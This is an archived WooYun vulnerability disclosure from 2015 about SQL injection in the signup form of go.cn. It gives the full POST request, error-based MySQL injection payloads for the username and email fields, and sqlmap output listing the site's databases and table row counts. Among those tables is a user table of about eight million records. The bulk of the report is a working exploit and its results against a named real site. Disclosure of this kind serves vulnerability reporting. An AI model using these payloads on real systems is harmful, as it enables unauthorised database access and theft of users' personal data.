乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-05: 细节已通知厂商并且等待厂商处理中 2015-06-10: 厂商已经主动忽略漏洞,细节向公众公开
233
注册的地方http://www.go.cn:80/index.php?m=signup (POST)commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=beijing&do=insert&email=ag&password=wyd&password2=wyD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=wooyun&yanzhengma=1
---Parameter: username (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(6431=6431,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RTTd'='RTTd&yanzhengma=1 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)Parameter: email (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag' AND (SELECT 8651 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(8651=8651,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'krPi'='krPi&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb&yanzhengma=1 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0available databases [10]:[*] baiduzy[*] go[*] go.cn[*] gocnappapi[*] gocnopen[*] mysql[*] nuomi[*] percona[*] performance_schema[*] testDatabase: go.cn+-------------------------------------------+---------+| Table | Entries |+-------------------------------------------+---------+| jiuder_source_address_history | 31943364 || jiuder_user | 8062578 || jiuder_adminlog | 6192775 || jiuder_KeywordSearchInfo | 5645317 || jiuder_smslog_20130817 | 4231301 || jiuder_order | 4174809 || jiuder_subway_station_group_relation | 2776647 || jiuder_maillog | 2422258 || jiuder_useraddress | 2366783 || jiuder_network | 2275597 || jiuder_usercoupons | 1639313 || jiuder_access_info | 1512328 || jiuder_creditlog | 1487229 || jiuder_brand_click | 1152692 || jiuder_supplier_tuikuan_flow_log | 1065049 || jiuder_group | 1043867 || jiuder_baidu_type_group | 1043861 || jiuder_group_relation_changecate2 | 1040469 || jiuder_group_relation_changecate | 1039236 || jiuder_supplier_lalotude | 1032639 || jiuder_group_information | 1024431 || jiuder_360_type_group | 1004924 || jiuder_operation_history | 940136 || jiuder_othersites_relation_group | 854442 || jiuder_area_business_group_relation | 850113 || jiuder_water_table_set | 740059 || jiuder_groupcoupons | 736374 || jiuder_orderlog | 730253 || jiuder_invalid_order | 695579 || jiuder_lottery | 675531 || jiuder_baidurecord | 475263 || jiuder_asyncode_order | 475153 || ip_address | 403719 || jiuder_smslog | 399792 || jiuder_source | 377672 || jiuder_user_subjoin | 346186 || jiuder_call_log | 340588 || jiuder_supplier_schedule | 331731 || jiuder_supplier_tuikuan_yunfei | 318747 || jiuder_group_property_value | 303649 || jiuder_error_log | 274149 || jiuder_order_return_log | 216548 || jiuder_supplier_tuikuan_flow_log_history | 209341 || jiuder_asyncode_order_history | 207810 || jiuder_supplier_tuikuan_flow_info | 206542 || jiuder_supplier_tuikuan | 198427 || jiuder_total_salenum_table | 195616 || jiuder_group_relation_type | 157447 || jiuder_click_demand | 127518 || jiuder_consult | 121296 || jiuder_group_property_relation | 120071 || jiuder_group_top_gid | 108376 || jiuder_order_return | 104903 || jiuder_api_visits | 104008 || jiuder_complaints | 103539 || jiuder_othersites_relation_user | 98315 || jiuder_group_oneday_statistics | 97446 || jiuder_totalorder | 89057 || jiuder_chargecard | 84374 || jiuder_KeywordSearchHistory | 84318 || jiuder_feedback | 82449 || jiuder_ctrip_usetime_change | 75469 || jiuder_supplier_tuikuan_flow_info_history | 74400 || jiuder_othersites_relation_order | 67580 || jiuder_group_property_name | 67258 || jiuder_waplog | 58926 || jiuder_luckgame_log | 54031 || jiuder_source_address | 52825 || jiuder_voucher_order_act | 51440 || jiuder_daily_statistic | 51089 || jiuder_projects | 41561 || jiuder_invite | 37080 || jiuder_modify_mobilebind | 33033 || jiuder_holiday | 28506 || jiuder_area_and_business | 25055 || jiuder_supplier | 22215 || jiuder_change_api_gid | 21420 || jiuder_group_api_line | 21329 || egg_record | 17002 || jiuder_maillist | 13297 || jiuder_supplier_tuikuan_account | 12600 || jiuder_masses_comments | 11658 || jiuder_set_jinshan_api | 11650 || tmp | 10000 |.......................
~~~~~~~~~~~~~请别放弃治疗。
危害等级:无影响厂商忽略
忽略时间:2015-06-10 10:54
漏洞Rank:15 (WooYun评价)
暂无